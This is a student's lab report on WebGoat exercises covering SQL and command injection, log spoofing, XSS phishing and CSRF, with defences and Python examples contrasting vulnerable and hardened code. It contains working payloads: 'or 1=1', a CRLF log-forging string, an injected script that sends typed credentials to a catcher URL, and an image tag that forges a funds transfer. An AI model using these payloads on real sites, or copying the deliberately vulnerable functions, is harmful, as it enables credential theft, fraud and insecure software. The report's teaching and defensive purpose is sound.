2018-2019-2 20162329 "Network Warfare Technology" Exp9: Web Security Essentials

Exp9: Web Security Essentials

One: Basics

1. SQL injection attacks

  • Principle:
    • An attacker exploits a flaw in the application code by entering special characters and malicious SQL fragments through a form, so that the back end executes the injected SQL, with unpredictable or irreversible consequences for the data in the database.
  • Defensive measures:
    • Avoid unnecessary form submission pages.
    • Control form input, for example by restricting the allowed character types and limiting the input length.
    • Use the permission mechanism of the database layer to restrict which operations the application account may perform.

2. XSS (cross-site scripting) attacks

  • Principle:
    • An attacker exploits a vulnerability in a website to inject malicious script code, either delivered directly or stored on the server, abusing the browser's trust in the site; when a normal user visits the page, the script runs in their browser and can, for example, steal the user's cookie or other information.
  • Defensive measures:
    • Avoid having the browser remember user-entered usernames and passwords.
    • Website developers should filter the data uploaded by users.
    • Control the input form.

3. CSRF (cross-site request forgery)

  • Principle:
    • A user logs in to website A with a username and password; after verifying them, site A generates and returns a cookie, and from then on the browser attaches that cookie to every normal request to site A. Before the user logs out of site A, they visit a malicious site B; site B returns attack code that issues a request to site A, so at B's instigation the browser sends that request to A together with the user's cookie. Site A cannot tell that the request was forged, so it carries out the malicious action.
  • Defensive measures:
    • Require a token with each request.
    • Verify the Referer header.
    • Add a random verification code.
    • Set the cookie domain.

Two: SQL injection

1. Command injection

  • Attack process: malicious command data is passed in through a form submission and executed on the server side.
  • Experiment procedure:
    • Right-click on the page and select Inspect Element.
    • Press F12 to view the page source.
    • Click the View button; the result of executing the command is shown below:
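The lesson above feeds a form value into a server-side command. The following is an added illustration (not WebGoat's code) of why that is dangerous and how the safe version looks: the vulnerable function splices the user's choice into a shell command line, the hardened one allowlists the name against the files that actually exist and reads the file without any shell. The help directory and its contents are constructed for the demo; the payload uses a shell separator to append a second command.

```python
import os
import subprocess
import tempfile

# Constructed help directory standing in for the lesson's help-file viewer (not WebGoat's files).
HELP_DIR = tempfile.mkdtemp(prefix="helpfiles_")
with open(os.path.join(HELP_DIR, "intro.help"), "w", encoding="utf-8") as fh:
    fh.write("Welcome to the help viewer.\n")


def view_help_unsafe(name):
    # The form value is spliced into a shell command line: ';', '&' or '|' end the
    # intended command and start whatever the attacker appended.
    result = subprocess.run("cat " + os.path.join(HELP_DIR, name),
                            shell=True, capture_output=True, text=True)
    return result.stdout


def view_help_safe(name):
    # Allowlist: the name must be exactly one of the files present in HELP_DIR, and the
    # file is read directly, so user data is never parsed by a shell.
    if name not in os.listdir(HELP_DIR):
        raise ValueError("unknown help file")
    with open(os.path.join(HELP_DIR, name), encoding="utf-8") as fh:
        return fh.read()


def demo():
    payload = "intro.help; echo INJECTED"   # constructed payload with a shell separator
    unsafe_out = view_help_unsafe(payload)
    try:
        view_help_safe(payload)
        verdict = "accepted"
    except ValueError:
        verdict = "rejected"
    return "INJECTED" in unsafe_out, verdict, view_help_safe("intro.help")


if __name__ == "__main__":
    print(demo())
```

Even when a subprocess is unavoidable, passing the command as an argument list without `shell=True` keeps metacharacters from being interpreted; the allowlist is still needed so a user cannot select arbitrary files.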

2. Numeric injection

  • Attack process: enter an always-true expression into a numeric form field so that the injected SQL statement is guaranteed to be executed.
  • Experiment procedure:
    • View the page source and modify value='101' by appending or 1=1, building the always-true condition as follows:
    • Click the button; the result is as follows:
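The numeric injection above, and the input-control and permission defences listed in the Basics section, can be shown side by side in code. This is an added example (not WebGoat's code) using an in-memory SQLite table constructed for the demo: the vulnerable lookup concatenates the form value into the query, the parameterized lookup binds it, and the hardened lookup additionally applies the "limit the character type" control by requiring an integer.

```python
import sqlite3


def make_db():
    # Constructed in-memory table standing in for the lesson's employee data (not WebGoat's schema).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE employee (userid INTEGER, name TEXT, salary INTEGER)")
    conn.executemany("INSERT INTO employee VALUES (?, ?, ?)",
                     [(101, "Larry", 55000), (102, "Moe", 140000), (103, "Curly", 50000)])
    return conn


def lookup_vulnerable(conn, userid_param):
    # The form value is concatenated into SQL text, so "101 or 1=1" rewrites the WHERE clause.
    sql = "SELECT userid, name FROM employee WHERE userid = " + str(userid_param)
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, userid_param):
    # Bound parameter: the value travels as data and is never parsed as SQL, whatever it contains.
    return conn.execute("SELECT userid, name FROM employee WHERE userid = ?",
                        (userid_param,)).fetchall()


def lookup_hardened(conn, userid_param):
    # Input control from the defence list ("limit the character type") plus parameter binding.
    try:
        userid = int(userid_param)
    except (TypeError, ValueError):
        raise ValueError("userid must be an integer")
    return lookup_parameterized(conn, userid)


def demo():
    conn = make_db()
    payload = "101 or 1=1"                  # the always-true condition from the lesson
    leaked_rows = len(lookup_vulnerable(conn, payload))      # every employee comes back
    bound_rows = len(lookup_parameterized(conn, payload))    # nothing matches the literal text
    try:
        lookup_hardened(conn, payload)
        verdict = "accepted"
    except ValueError:
        verdict = "rejected"
    return leaked_rows, bound_rows, verdict, lookup_hardened(conn, "101")


if __name__ == "__main__":
    print(demo())
```

The third defence from the Basics list, database-layer permissions, is not visible in this snippet: it means the account the application connects with is granted only SELECT on the tables it needs, so even a successful injection cannot modify or drop data.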

3. Log spoofing

  • Attack process: the attacker injects a crafted input (here, encoded line-break characters) so that forged entries are written into the log file.
  • Experiment procedure:
    • In the form provided by the lab environment, enter 2329%0d%0aLogin Succeeded for username: 162329, where %0d and %0a are the carriage return and line feed characters.
    • The result is shown below:
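What happens to the log line in the step above, and the corresponding fix, as an added example (not WebGoat's code). It uses the lesson's own payload, decodes it the way the web layer would, and compares a logger that appends the raw username with one that escapes record separators; a small writer-side check flags entries that span more than one line. The log format is constructed for the demo.

```python
from urllib.parse import unquote

# The lesson's input, exactly as typed into the form (CR and LF are URL-encoded).
PAYLOAD = "2329%0d%0aLogin Succeeded for username: 162329"


def write_entry_unsafe(log_lines, username):
    # The raw username is appended: an embedded CR LF starts a second, forged record.
    log_lines.append("Login failed for username: " + username)


def sanitize_for_log(value):
    # Escape record separators instead of silently dropping them, so the attempt stays
    # visible to whoever reads the log.
    return value.replace("\r", "\\r").replace("\n", "\\n")


def write_entry_safe(log_lines, username):
    log_lines.append("Login failed for username: " + sanitize_for_log(username))


def records(log_lines):
    # What a log reader (or a SIEM parser) sees: one record per physical line.
    return "\n".join(log_lines).splitlines()


def suspicious_entries(log_lines):
    # Detection on the writer side: a single entry that spans several lines was built
    # from input that contained line breaks.
    return [entry for entry in log_lines if len(entry.splitlines()) > 1]


def demo():
    username = unquote(PAYLOAD)          # the web layer decodes %0d%0a into real CR LF
    unsafe, safe = [], []
    write_entry_unsafe(unsafe, username)
    write_entry_safe(safe, username)
    return (records(unsafe), records(safe),
            len(suspicious_entries(unsafe)), len(suspicious_entries(safe)))


if __name__ == "__main__":
    for line in demo()[0]:
        print(line)
```

Structured logging (one JSON object per event, with the username as a quoted field) removes the problem at the format level, because the serializer escapes control characters for you.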

Three: XSS attacks

1. XSS phishing attack

  • Attack process: inject script through a form input to modify the page's HTML and produce a phishing page, so that whatever the user types into it is captured as they enter it.
  • Experiment procedure:
    • Enter the script code into the form in the test environment to construct the phishing interface.
    • The interface code is as follows:
    <form>
    <br><br><HR><H3>This feature requires account login:</H3><br><br>
    Enter Username:<br><input type="text" id="user" name="user"><br>
    Enter Password:<br><input type="password" name="pass"><br>
    <!-- the submit button the user clicks; its handler runs hack() below -->
    <input type="submit" name="login" value="Login" onclick="hack()">
    </form><br><br><HR>
    <script>
    function hack()
    {
     // Show what was captured (the lesson's demonstration message)...
     alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.forms[0].user.value + " Password = " + document.forms[0].pass.value);
     // ...and send the values to the WebGoat catcher endpoint via an image request.
     XSSImage=new Image;
     XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.forms[0].user.value + "&password=" + document.forms[0].pass.value;
    }
    </script>
  • The above code is entered into the search box and Search is clicked, as shown:
  • When the user clicks Submit, the attacker's interface appears as shown below:
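The search box in the lesson reflects the entered text straight back into the page, which is what lets the form and script above render. The following added example (not WebGoat's code) shows the two defences from the Basics list in a server-side template function: output encoding of the reflected term, and an allowlist on the search input. The payload is a shortened, constructed version of the phishing form, and the render functions stand in for the lesson's page template.

```python
import html
import re

# Constructed payload modelled on the lesson: a form plus a script injected through the search box.
PAYLOAD = ('<form>Enter Username:<input type="text" name="user"></form>'
           '<script>function hack(){ alert(document.forms[0].user.value); }</script>')


def render_unsafe(term):
    # Reflects the search term into the page as-is: the browser parses the injected tags.
    return "<p>Results for: " + term + "</p>"


def render_safe(term):
    # Output encoding: '<', '>', '&', '"' and "'" become entities, so the payload is
    # displayed as text instead of being interpreted as markup.
    return "<p>Results for: " + html.escape(term, quote=True) + "</p>"


SEARCH_TERM_RE = re.compile(r"^[\w\s.-]{1,64}$")


def search_term_allowed(term):
    # Input validation ("control the input form"): allowlist the characters a search term
    # legitimately needs, rejecting the payload before it is stored or echoed.
    return SEARCH_TERM_RE.fullmatch(term) is not None


def contains_active_markup(fragment):
    # Check a test or reviewer can run over rendered output.
    return re.search(r"<\s*(script|form|img|iframe)\b", fragment, re.I) is not None


def demo():
    return (contains_active_markup(render_unsafe(PAYLOAD)),
            contains_active_markup(render_safe(PAYLOAD)),
            search_term_allowed(PAYLOAD),
            search_term_allowed("user guide v1.2"))


if __name__ == "__main__":
    print(render_safe(PAYLOAD))
```

Encoding must match the output context: `html.escape` is right for element bodies and quoted attributes, but a value placed inside a script block or a URL needs that context's own encoding. A Content-Security-Policy that disallows inline script is a further layer that stops the `<script>` and `onclick` parts of this payload from running even if encoding is missed somewhere.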

Four: CSRF attacks

1. CSRF

  • Attack process:
    • A malicious user sends a URL to lure another user into clicking it, which triggers the CSRF attack. To make the deception easier, the URL can be hidden inside an image.
  • Experiment procedure:
    • Look up the Screen and menu parameters in the lesson's src attribute; their values are 261 and 900.
    • In the message box, enter <img src="http://localhost:8080/WebGoat/attack?Screen=261&menu=900&transferFunds=2329"/> and click Submit; the result is as follows:
    • When a user views the message, loading the image issues the request and transfers 2329 out of that user's account.
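Server-side handling that defeats the planted image above, as an added example (not WebGoat's code), covering the token, Referer and method checks from the Basics list. The request objects, session identifier and server key are constructed for the demo. It also shows the limit of the Referer check that this lesson exposes: the image is stored on the same site's message board, so the forged request arrives with a same-origin Referer and is stopped only by the method requirement and the missing token.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

OWN_ORIGIN = "http://localhost:8080"       # the WebGoat origin used in the lesson
SERVER_KEY = secrets.token_bytes(32)      # per-deployment secret, generated here for the demo


def issue_token(session_id):
    # Token bound to the session; the page that renders the transfer form embeds it in a
    # hidden field. A page on another origin cannot read it, and an <img> cannot send it.
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def token_valid(session_id, presented):
    return presented is not None and hmac.compare_digest(issue_token(session_id), presented)


def same_origin(headers):
    # Prefer Origin, fall back to Referer; a missing header fails closed for state changes.
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == OWN_ORIGIN


def transfer_funds(request, session_id):
    # request is a constructed dict: {"method", "headers", "params"}.
    if request["method"] != "POST":
        return "rejected: state change must use POST"
    if not same_origin(request["headers"]):
        return "rejected: cross-origin request"
    if not token_valid(session_id, request["params"].get("csrf_token")):
        return "rejected: missing or invalid CSRF token"
    return "transferred " + request["params"]["transferFunds"]


def demo():
    sid = "session-2329"   # constructed session identifier
    # What the browser sends when it loads the <img> planted in the message board: a GET
    # with a same-origin Referer and the parameters from the lesson, but no token.
    forged_get = {"method": "GET",
                  "headers": {"Referer": OWN_ORIGIN + "/WebGoat/attack?Screen=261&menu=900"},
                  "params": {"Screen": "261", "menu": "900", "transferFunds": "2329"}}
    # Same request if the attacker managed to make it a POST (e.g. an auto-submitting form).
    forged_post = dict(forged_get, method="POST")
    # A genuine submission from the transfer form rendered by the site itself.
    legit = {"method": "POST",
             "headers": {"Origin": OWN_ORIGIN},
             "params": {"transferFunds": "10", "csrf_token": issue_token(sid)}}
    return (transfer_funds(forged_get, sid),
            transfer_funds(forged_post, sid),
            transfer_funds(legit, sid))


if __name__ == "__main__":
    for outcome in demo():
        print(outcome)
```

The "set the cookie domain" item from the Basics list corresponds in current browsers to the SameSite attribute on the session cookie: with SameSite=Lax or Strict the browser does not attach the cookie to cross-site requests at all, which blocks the external-link variant of this attack but, like the Referer check, not the same-site stored variant shown in the lesson.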

Five: Experiment summary and reflections

Through this experiment I really got a feel for what SQL injection, XSS attacks and CSRF attacks are, understood their processes in practice, and also summed up my own defences against these attacks; I feel I benefited a lot.

Origin www.cnblogs.com/Zhangxusheng/p/10926028.html